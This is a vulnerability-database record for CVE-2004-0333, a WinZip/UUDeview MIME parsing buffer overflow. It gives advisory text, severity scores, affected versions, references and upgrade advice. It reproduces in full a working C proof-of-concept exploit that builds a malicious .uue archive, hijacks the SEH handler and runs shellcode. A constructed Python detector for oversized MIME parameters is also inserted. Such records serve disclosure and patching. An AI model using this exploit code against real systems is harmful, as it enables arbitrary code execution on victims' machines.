CVE-2004-0333
CVSS 10.0
Published: 2004-11-23 00:00:00
Revised: 2008-09-10 15:25:52

[Original] Buffer overflow in the UUDeview package, as used in WinZip 6.2 through WinZip 8.1 SR-1, and possibly other packages, allows remote attackers to execute arbitrary code via a MIME archive with certain long MIME parameters.


[CNNVD] WinZip MIME Parsing Buffer Overflow Vulnerability (CNNVD-200411-130)

        
        WinZip is a compression and decompression utility for the Windows platform.
        A function in WinZip mishandles the parsing of certain parameters. A remote attacker can exploit this by building a malicious archive and enticing a user to process it, possibly executing arbitrary code on the system with the privileges of the WinZip process.
        The problem lies in the UUDeview package, which WinZip uses to support several decoding functions. When an overly long string is supplied for certain parameters of a MIME archive (.mim, .uue, .uu, .b64, .bhx, .hqx and .xxe extensions), WinZip crashes with "internal error in file misc.c line 132". A carefully crafted malicious archive can trigger a buffer overflow when the target user parses the MIME file with WinZip, possibly executing arbitrary code with the privileges of the WinZip process.
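As an added defensive example (not part of this record, nor code from UUDeview or WinZip), the following triage check looks for the condition described above: it parses the header block of a MIME archive, unfolds continuation lines, and flags Content-* parameters such as boundary= whose values are implausibly long. The 256-character threshold, the helper names and the sample inputs are constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

# File extensions that WinZip hands to the bundled UUDeview decoder (listed in the advisory).
MIME_ARCHIVE_EXTENSIONS = (".mim", ".uue", ".uu", ".b64", ".bhx", ".hqx", ".xxe")

# Constructed threshold: RFC 2046 limits a boundary to 70 characters and ordinary
# Content-* parameters stay far shorter, so anything beyond this is worth a look.
MAX_PARAM_LEN = 256

# name=value or name="quoted value"; RFC 2231 names (filename*=) are accepted too.
_PARAM_RE = re.compile(r'([A-Za-z0-9_*-]+)\s*=\s*("[^"]*"|[^;\s]*)')

def is_mime_archive(filename: str) -> bool:
    """True if the file name carries one of the extensions the decoder handles."""
    return filename.lower().endswith(MIME_ARCHIVE_EXTENSIONS)

def parse_header_block(data: bytes) -> List[Tuple[str, str]]:
    """Return (name, value) pairs from the header block, unfolding continuation lines."""
    text = data.decode("latin-1")                        # byte-preserving, never raises
    head = re.split(r"\r?\n\r?\n", text, maxsplit=1)[0]  # headers end at the first blank line
    unfolded = re.sub(r"\r?\n[ \t]+", " ", head)         # join RFC 822 folded lines
    headers = []
    for line in unfolded.splitlines():
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers

def find_long_parameters(data: bytes, limit: int = MAX_PARAM_LEN) -> List[Dict[str, object]]:
    """Flag Content-* header parameters (boundary=, name=, filename=, ...) longer than `limit`."""
    findings = []
    for name, value in parse_header_block(data):
        if not name.startswith("content-"):
            continue
        for pname, pvalue in _PARAM_RE.findall(value):
            length = len(pvalue.strip('"'))
            if length > limit:
                findings.append({"header": name, "param": pname.lower(), "length": length})
    return findings

# Constructed samples: a normal multipart header and one with an oversized, folded boundary.
BENIGN_SAMPLE = (b'Content-Type: multipart/mixed; boundary="simple boundary"\r\n'
                 b"Content-Transfer-Encoding: 7bit\r\n\r\n--simple boundary\r\n")
SUSPECT_SAMPLE = (b"Content-Type: multipart/mixed;\r\n boundary=" + b"A" * 600 +
                  b"\r\nContent-Disposition: attachment; filename=x.txt\r\n\r\nbody\r\n")

if __name__ == "__main__":
    print(find_long_parameters(SUSPECT_SAMPLE))
```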
        

- CVSS (Base Score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected platforms and products)

cpe:/o:gentoo:linux:1.4:rc1    Gentoo Linux 1.4 rc1
cpe:/a:winzip:winzip:7.0    WinZip 7.0
cpe:/o:gentoo:linux:1.4:rc2    Gentoo Linux 1.4 rc2
cpe:/o:gentoo:linux:1.4    Gentoo Linux 1.4
cpe:/a:uudeview:uudeview:0.5.19
cpe:/a:winzip:winzip:8.1:sr1    WinZip 8.1 SR1
cpe:/a:winzip:winzip:8.0    WinZip 8.0
cpe:/a:uudeview:uudeview:0.5.18
cpe:/a:openpkg:openpkg    OpenPKG
cpe:/o:gentoo:linux:1.4:rc3    Gentoo Linux 1.4 rc3
cpe:/a:winzip:winzip:8.1    WinZip 8.1

- OVAL (Technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0333
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0333
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-130
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/116182
(VENDOR_ADVISORY)  CERT-VN  VU#116182
http://www.securityfocus.com/bid/9758
(VENDOR_ADVISORY)  BID  9758
http://xforce.iss.net/xforce/xfdb/15490
(UNKNOWN)  XF  uudeview-multiple-bo(15490)
http://xforce.iss.net/xforce/xfdb/15336
(VENDOR_ADVISORY)  XF  winzip-mime-bo(15336)
http://www.winzip.com/fmwz90.htm
(UNKNOWN)  CONFIRM  http://www.winzip.com/fmwz90.htm
http://www.osvdb.org/4119
(UNKNOWN)  OSVDB  4119
http://www.openpkg.org/security/OpenPKG-SA-2004.006-uudeview.html
(UNKNOWN)  CONFIRM  http://www.openpkg.org/security/OpenPKG-SA-2004.006-uudeview.html
http://www.idefense.com/application/poi/display?id=76&type=vulnerabiliti&flashstatus=true
(UNKNOWN)  IDEFENSE  20040227 WinZip MIME Parsing Buffer Overflow Vulnerability
http://www.ciac.org/ciac/bulletins/o-092.shtml
(UNKNOWN)  CIAC  O-092
http://secunia.com/advisories/11019
(UNKNOWN)  SECUNIA  11019
http://secunia.com/advisories/10995
(UNKNOWN)  SECUNIA  10995

- Vulnerability information

WinZip MIME Parsing Buffer Overflow Vulnerability
Critical  Boundary condition error
2004-11-23 00:00:00  2006-06-26 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        WinZip
        ------
        The vendor has released an upgrade that fixes this security issue; download it from the vendor's homepage.
        The current WinZip 9.0 corrects this vulnerability, and users are advised to download and use it:
        
        http://www.winzip.com/

- Vulnerability information (272)

WinZIP MIME Parsing Overflow Proof of Concept Exploit (EDBID:272)
windows local
2004-04-15 Verified
snooq
/*
 *  Author: snooq       
 *  Date: 14 April 2004  
 *
 *  This is a PoC exploit for WinZip32 MIME Parsing Overflow
 *  bug reported by iDefense on 27 February 2004.
 *
 *  The original advisory is found here:
 *  http://www.idefense.com/application/poi/display?id=76
 *
 *  This version is SP dependent becoz my idiotic shellcode
 *  uses hardcoded addresses.... =p 
 *  
 *  So, test it locally only. Afterall, it's just a PoC rite?
 *  Nonetheless, it's possible to make it more portable by 
 *  using a universal shellcode... 
 *
 *  but beware... chars like <>,.:;'"=[]\/ are filtered...
 *  so feel free to XOR it.. =p
 *
 *  Notes
 *  =====
 *  1) Tested against WinZip 8.1 on WinXP SP1, Win2K SP1 only
 *
 *  2) You need to first launch WinZip before you 'Open'
 *
 *  3) Double clicking the 'uue' won't work 
 *     why so? go figure it out urself... =p 
 *     once u know why... u'd then know how to fix it...
 *
 *  Greetz
 *  ======
 *  # eugene, nam, jf, valmont and the rest..
 *  # sk, shashank + Security_Auditors folks...
 *  # iDefense folks... SiG^2 guys etc...
 *  # lastly.. Greg Hoglund for his 'Cross Page' stuffs... =p
 */

/*
 *  A snapshot of the 'crash'
 *  =========================
 *
 *  Our buffer on the heap looks like this:
 *  
 *  [....AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEEEEEEEEEEEEEEE....]
 *  |--- heap grows this way --------->
 *
 *   
 *  and the CPU is about to execute the following code:
 *
 *  0049BFFC  |> 8B4C13 08      MOV ECX,DWORD PTR DS:[EBX+EDX+8]
 *  0049C000  |. 8B7C13 04      MOV EDI,DWORD PTR DS:[EBX+EDX+4]
 *  0049C004  |. 8979 04        MOV DWORD PTR DS:[ECX+4],EDI
 *  0049C007  |. 8B4C13 04      MOV ECX,DWORD PTR DS:[EBX+EDX+4]
 *  0049C00B  |. 8B7C13 08      MOV EDI,DWORD PTR DS:[EBX+EDX+8]
 *  0049C00F  |. 035D F8        ADD EBX,DWORD PTR SS:[EBP-8]
 *  0049C012  |. 8979 08        MOV DWORD PTR DS:[ECX+8],EDI
 *  0049C015  |. 895D F4        MOV DWORD PTR SS:[EBP-C],EBX
 *
 *  and, EBX register seems to be under our control... =p
 *
 *  EDX = ptr to 'DDDD'	
 *  EBX = 'DDDD' - 1		
 *
 *  By carefully choosing a value for EBX, we are able to manipulate
 *  ECX at 0049BFFC and EDI at 0049C000.
 *
 *  If we set 'DDDD'=0xfffffff5 (-11), 
 *  
 *  -> EBX would be '0xfffffff4' (-12)
 *  -> [EBX+EDX+8] becomes [EDX-4] and ECX = 'CCCC'
 *  -> [EBX+EDX+4] becomes [EDX-8] and EDI = 'BBBB'
 *
 *  Effectively at 0049C004, we can write a DWORD 'BBBB' to ['CCCC'+4]
 *  After that.....
 *
 *  -> [EBX+EDX+4] becomes [EDX-8] and ECX = 'BBBB'
 *  -> [EBX+EDX+8] becomes [EDX-4] and EDI = 'CCCC' 
 *  
 *  Finally we reach MOV DWORD PTR DS:['BBBB'+8],'CCCC' at 0049C012..
 *
 *  Choosing the rite values for 'BBBB' + 'CCCC', execution flow could
 *  be reliably diverted into our shellcode.
 *
 *  In this exploit, I've chosen to install our code as the main thread's
 *  top exception handler so that when exception is triggered at 0049C012,
 *  our code will be called to 'handle' it... =p
 *
 *  This is how I did it but I'm not sure if this is the best way.
 *  If you know of any other better way to exploit this.....
 *  pleaseeeeee tell me....... :)
 *
 */

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>	/* memset(), memcpy() */

#define TARGET	1
#define NOP	0x90

/*
 * Gap for NOPs (not really needed)
 */
#define PAD	0		

/*
 * This 'RANGE' nonsense was useful
 * in locating the 'index', i.e. 'DDDD'
 */
#define RANGE	1*4		

/*
 * Where we control the 'index',
 * i.e EBX register's value
 */
#define IDXOFF	268-RANGE+4 

/*
 * We find our 'where' + 'what' here...
 */
#define OFFSET	IDXOFF-8	

/*
 * -12 bytes from 'index' into where
 * 'where'+'what' are...
 */
#define INDEX	0xfffffff5	 

#define BSIZE	1024
#define FNAME	"snooq.uue"
#define SSIZE	sizeof(shellcode)-1
#define HSIZE	sizeof(header)-1

char buff[BSIZE];
long where, what;

struct {
	char *os;
	long topSEH;
	long jmpADD;
}

targets[] = {
	{
		"Window XP (en) SP1",
		0x7ffddffe,	// Per Thread Top SEH - 2
		0xf27cffff  // [this address + 4] -> shellcode
	},
	{
		"Window 2000 (en) SP1",
		0x7ffddffe,	// Per Thread Top SEH - 2
		0xf354ffff  // [this address + 4] -> shellcode
	},
}, v;

/*
 * Harmless payload that spawns 'notepad.exe'... =p
 */

char shellcode[]=
	"\x55"					// push ebp 
	"\x8b\xec"				// mov ebp, esp
	"\x33\xf6"				// xor esi, esi
	"\x56"					// push esi
	"\x68\x2e\x65\x78\x65"	// push 'exe.'
	"\x68\x65\x70\x61\x64"	// push 'dape'
	"\x68\x90\x6e\x6f\x74"	// push 'ton'
	"\x46"					// inc esi		
	"\x56"					// push esi
	"\x8d\x7d\xf1"			// lea edi, [ebp-0xf]	
	"\x57"					// push edi		
	"\xb8XXXX"				// mov eax, XXXX -> WinExec()  
	"\xff\xd0"				// call eax
	"\x4e"					// dec esi
	"\x56"					// push esi
	"\xb8YYYY"				// mov eax, YYYY -> ExitProcess()  
	"\xff\xd0";				// call eax

char header[]="Content-Type: multipart/mixed; boundary=";

void err_exit(char *s)
{
	printf("%s\n",s);
	exit(0);
}

void filladdr()
{
	char *ptr;
	int i=0, index=INDEX, idxoff=IDXOFF;

	long addr1=(long)WinExec;
	long addr2=(long)ExitProcess;

	printf("-> WinExec() is at: 0x%08x\n",addr1);
	printf("-> ExitProcess() is at: 0x%08x\n",addr2);

	ptr=shellcode;

	while (*ptr!='\0') {
		if (*((long *)ptr)==0x58585858) {
			printf("-> Filling in WinExec at offset: %d\n",(ptr-shellcode));
			*((long *)ptr)=addr1;
		}
		if (*((long *)ptr)==0x59595959) {
			printf("-> Filling in ExitProcess at offset: %d\n",(ptr-shellcode));
			*((long *)ptr)=addr2;
		}
		ptr++;
	}

	ptr=buff+HSIZE+OFFSET;
	printf("-> 'what' == 0x%08x at offset %d\n",what,OFFSET);
	*((long *)ptr)=what;

	ptr+=4;
	printf("-> 'where' == 0x%08x at offset %d\n",where,OFFSET+4);
	*((long *)ptr)=where-4;

	ptr=buff+HSIZE+idxoff;

	for (;i<RANGE;i+=4) {
		printf("-> 'index' == 0x%08x at offset %d\n",index-i,idxoff+i);
		*((long *)(ptr+i))=index-i;
	}

}

void buildfile() 
{
	int i=0;

	FILE *fd;

	if ((fd=fopen(FNAME,"w"))==NULL) {
		err_exit("-> Failed to generate file...");
	}

	for(;i<sizeof(buff);) {
		fprintf(fd,"%c",buff[i++]);
	}

	fclose(fd);

	printf("-> '%s' generated....\n",FNAME);

}

int main(int argc, char *argv[]) 
{
	int i=0, t=TARGET;

	if (argc==2) { t=atoi(argv[1]); }

	where=targets[t-1].topSEH;
	what=targets[t-1].jmpADD;

	printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [jinyean@hotmail.com]\n\n");

	memset(buff,NOP,BSIZE);
	printf("-> Generating 'uue' file for target #%d...\n",t);
	memcpy(buff,header,HSIZE);
	filladdr();
	memcpy(buff+HSIZE+IDXOFF+4+PAD,shellcode,SSIZE);
	buildfile();

	return 0;

}


// milw0rm.com [2004-04-15]
		

- Vulnerability information

4076
WinZip MIME Archive Parsing Overflow
Local Access Required Input Manipulation
Loss of Integrity

- Vulnerability description

A local overflow exists in WinZip. The overflow is triggered by a specially crafted archive file, which an attacker can use to cause arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2004-02-27 2004-01-13
Unknown Unknown

- Solution

Upgrade to version 9.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

UUDeview MIME Archive Buffer Overrun Vulnerability
Boundary Condition Error 9758
Yes No
2004-02-27 12:00:00 2009-07-12 03:06:00
This issue was announced by iDEFENSE.

- Affected program versions

WinZip WinZip 8.1 SR-1
WinZip WinZip 8.1
WinZip WinZip 8.0
WinZip WinZip 7.0
UUDeview UUDeview 0.5.19
+ OpenPKG OpenPKG 2.0
UUDeview UUDeview 0.5.18
+ OpenPKG OpenPKG 1.3
OpenPKG OpenPKG Current
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4

- Unaffected program versions

WinZip WinZip 9.0
UUDeview UUDeview 0.5.20
Convert-UUlib Convert-UUlib 1.0.1
+ UUDeview UUDeview 0.5.20
Convert-UUlib Convert-UUlib 1.0
+ UUDeview UUDeview 0.5.20

- Vulnerability discussion

A buffer overrun vulnerability has been reported in UUDeview. This issue exists in the MIME parsing routines.

It is reported that this issue may be exploited via a malicious MIME archive that specifies excessively long strings for various parameters. This could be exploited to execute arbitrary code on a system in the context of a user who opens a malicious MIME archive using the UUDeview program.

It should be noted that UUDeview is shipped as a component of WinZip.

- Exploit

The reporters of this vulnerability possess proof-of-concept exploit code that is not publicly available or known to be circulating in the wild.

The following exploit has been provided by snooq to leverage this issue against WinZip on Windows 2000 and XP with SP1:

- Solution

UUDeview has released an updated version to address this issue.

This issue has been addressed in WinZip 9.0. Users are strongly urged to upgrade.

Gentoo Linux have released an advisory (200403-05) and updates to address this issue. Gentoo users are advised to upgrade to UUDeview 0.5.20 by emerging the updated packages as follows:
# emerge sync
# emerge -pv ">=app-text/uudeview-0.5.20"
# emerge ">=app-text/uudeview-0.5.20"

OpenPKG have released a security advisory (OpenPKG-SA-2004.006) and fixes to address this issue. Please see referenced advisory for further details.



- References